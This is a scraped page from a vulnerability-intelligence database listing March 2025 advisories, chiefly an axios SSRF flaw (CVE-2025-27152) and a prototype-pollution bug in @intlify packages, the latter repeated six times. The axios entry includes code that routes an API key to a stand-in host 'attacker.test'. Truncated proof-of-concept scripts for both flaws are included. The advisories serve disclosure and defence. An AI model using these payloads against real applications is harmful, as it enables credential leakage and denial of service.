CyberAlerts is shutting down on June 30th, 2025. Thank you for your support!
Threat and Vulnerability Intelligence Database
Example Searches:
CVE
Threat Actors
Countries
Vendors
Severity
Known Exploited
CVE-2025-27152 |
Description: axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.
CVSS: HIGH (7.7) EPSS Score: 0.05%
March 7th, 2025 (4 months ago)
|
|
CVE-2025-25617 |
Description: Incorrect Access Control in Unifiedtransform 2.X leads to Privilege Escalation allowing teachers to create syllabus.
EPSS Score: 0.02%
March 7th, 2025 (4 months ago)
|
|
Description: Communications Data Group Falls Victim to Qilin Ransomware
March 7th, 2025 (4 months ago)
|
|
|
Description: Summary
A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery).
Reference: axios/axios#6463
A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.
Details
Consider the following code snippet:
import axios from "axios";
const internalAPIClient = axios.create({
baseURL: "http://example.test/api/v1/users/",
headers: {
"X-API-KEY": "1234567890",
},
});
// const userId = "123";
const userId = "http://attacker.test/";
await internalAPIClient.get(userId); // SSRF
In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.
It is recommended that:
When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL.
Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL.
PoC
Follow the steps below to reproduce the issue:
Set up two simple HTTP servers:
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index....
March 7th, 2025 (4 months ago)
|
|
|
Description: Vulnerability type:
Prototype Pollution
Vulnerability Location(s):
# v9.1
node_modules/@intlify/message-resolver/index.js
# v9.2 or later
node_modules/@intlify/vue-i18n-core/index.js
Description:
The latest version of @intlify/message-resolver (9.1) and @intlify/vue-i18n-core (9.2 or later), (previous versions might also affected), is vulnerable to Prototype Pollution through the entry function(s) handleFlatJson. An attacker can supply a payload with Object.prototype setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) a the minimum consequence.
Moreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., exec, eval), it could enable an attacker to execute arbitrary commands within the application's context.
PoC:
// install the package with the latest version
~$ npm install @intlify/[email protected]
// run the script mentioned below
~$ node poc.js
//The expected output (if the code still vulnerable) is below.
// Note that the output may slightly differs from function to another.
Before Attack: {}
After Attack: {"pollutedKey":123}
// poc.js
(async () => {
const lib = await import('@intlify/message-resolver');
var someObj = {}
console.log("Before Attack: ", JSON.stringify({}.__proto__));
try {
// for mult...
March 7th, 2025 (4 months ago)
|
|
|
Description: Vulnerability type:
Prototype Pollution
Vulnerability Location(s):
# v9.1
node_modules/@intlify/message-resolver/index.js
# v9.2 or later
node_modules/@intlify/vue-i18n-core/index.js
Description:
The latest version of @intlify/message-resolver (9.1) and @intlify/vue-i18n-core (9.2 or later), (previous versions might also affected), is vulnerable to Prototype Pollution through the entry function(s) handleFlatJson. An attacker can supply a payload with Object.prototype setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) a the minimum consequence.
Moreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., exec, eval), it could enable an attacker to execute arbitrary commands within the application's context.
PoC:
// install the package with the latest version
~$ npm install @intlify/[email protected]
// run the script mentioned below
~$ node poc.js
//The expected output (if the code still vulnerable) is below.
// Note that the output may slightly differs from function to another.
Before Attack: {}
After Attack: {"pollutedKey":123}
// poc.js
(async () => {
const lib = await import('@intlify/message-resolver');
var someObj = {}
console.log("Before Attack: ", JSON.stringify({}.__proto__));
try {
// for mult...
March 7th, 2025 (4 months ago)
|
|
|
Description: Vulnerability type:
Prototype Pollution
Vulnerability Location(s):
# v9.1
node_modules/@intlify/message-resolver/index.js
# v9.2 or later
node_modules/@intlify/vue-i18n-core/index.js
Description:
The latest version of @intlify/message-resolver (9.1) and @intlify/vue-i18n-core (9.2 or later), (previous versions might also affected), is vulnerable to Prototype Pollution through the entry function(s) handleFlatJson. An attacker can supply a payload with Object.prototype setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) a the minimum consequence.
Moreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., exec, eval), it could enable an attacker to execute arbitrary commands within the application's context.
PoC:
// install the package with the latest version
~$ npm install @intlify/[email protected]
// run the script mentioned below
~$ node poc.js
//The expected output (if the code still vulnerable) is below.
// Note that the output may slightly differs from function to another.
Before Attack: {}
After Attack: {"pollutedKey":123}
// poc.js
(async () => {
const lib = await import('@intlify/message-resolver');
var someObj = {}
console.log("Before Attack: ", JSON.stringify({}.__proto__));
try {
// for mult...
March 7th, 2025 (4 months ago)
|
|
|
Description: Vulnerability type:
Prototype Pollution
Vulnerability Location(s):
# v9.1
node_modules/@intlify/message-resolver/index.js
# v9.2 or later
node_modules/@intlify/vue-i18n-core/index.js
Description:
The latest version of @intlify/message-resolver (9.1) and @intlify/vue-i18n-core (9.2 or later), (previous versions might also affected), is vulnerable to Prototype Pollution through the entry function(s) handleFlatJson. An attacker can supply a payload with Object.prototype setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) a the minimum consequence.
Moreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., exec, eval), it could enable an attacker to execute arbitrary commands within the application's context.
PoC:
// install the package with the latest version
~$ npm install @intlify/[email protected]
// run the script mentioned below
~$ node poc.js
//The expected output (if the code still vulnerable) is below.
// Note that the output may slightly differs from function to another.
Before Attack: {}
After Attack: {"pollutedKey":123}
// poc.js
(async () => {
const lib = await import('@intlify/message-resolver');
var someObj = {}
console.log("Before Attack: ", JSON.stringify({}.__proto__));
try {
// for mult...
March 7th, 2025 (4 months ago)
|
|
|
Description: Vulnerability type:
Prototype Pollution
Vulnerability Location(s):
# v9.1
node_modules/@intlify/message-resolver/index.js
# v9.2 or later
node_modules/@intlify/vue-i18n-core/index.js
Description:
The latest version of @intlify/message-resolver (9.1) and @intlify/vue-i18n-core (9.2 or later), (previous versions might also affected), is vulnerable to Prototype Pollution through the entry function(s) handleFlatJson. An attacker can supply a payload with Object.prototype setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) a the minimum consequence.
Moreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., exec, eval), it could enable an attacker to execute arbitrary commands within the application's context.
PoC:
// install the package with the latest version
~$ npm install @intlify/[email protected]
// run the script mentioned below
~$ node poc.js
//The expected output (if the code still vulnerable) is below.
// Note that the output may slightly differs from function to another.
Before Attack: {}
After Attack: {"pollutedKey":123}
// poc.js
(async () => {
const lib = await import('@intlify/message-resolver');
var someObj = {}
console.log("Before Attack: ", JSON.stringify({}.__proto__));
try {
// for mult...
March 7th, 2025 (4 months ago)
|
|
|
Description: Vulnerability type:
Prototype Pollution
Vulnerability Location(s):
# v9.1
node_modules/@intlify/message-resolver/index.js
# v9.2 or later
node_modules/@intlify/vue-i18n-core/index.js
Description:
The latest version of @intlify/message-resolver (9.1) and @intlify/vue-i18n-core (9.2 or later), (previous versions might also affected), is vulnerable to Prototype Pollution through the entry function(s) handleFlatJson. An attacker can supply a payload with Object.prototype setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) a the minimum consequence.
Moreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., exec, eval), it could enable an attacker to execute arbitrary commands within the application's context.
PoC:
// install the package with the latest version
~$ npm install @intlify/[email protected]
// run the script mentioned below
~$ node poc.js
//The expected output (if the code still vulnerable) is below.
// Note that the output may slightly differs from function to another.
Before Attack: {}
After Attack: {"pollutedKey":123}
// poc.js
(async () => {
const lib = await import('@intlify/message-resolver');
var someObj = {}
console.log("Before Attack: ", JSON.stringify({}.__proto__));
try {
// for mult...
March 7th, 2025 (4 months ago)
|